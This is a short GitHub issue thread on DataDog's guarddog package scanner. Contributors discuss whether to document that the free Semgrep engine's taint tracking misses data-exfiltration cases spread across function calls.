guarddog icon indicating copy to clipboard operation
guarddog copied to clipboard
verified publisher icon DataDog

Document limitations of taint tracking

Open enelli opened this issue 3 years ago • 1 comments

Deep Semgrep is needed to propagate values through function calls. An example of this is found in the exfiltrate-sensitive-data tests (ctx). It can also be seen here: https://semgrep.dev/s/enelli:exfiltrate-sensitive-data. The first case is not detected, but the second case that has only one function is caught.

enelli avatar Aug 08 '22 18:08 enelli

Renaming/labeling as this is not a bug but a documented limitation of the free version of Semgrep.

christophetd avatar Nov 28 '22 09:11 christophetd

I don't think we should document this, this is a limitation of the tool being used and the way we craft our rules

sobregosodd avatar Feb 13 '25 10:02 sobregosodd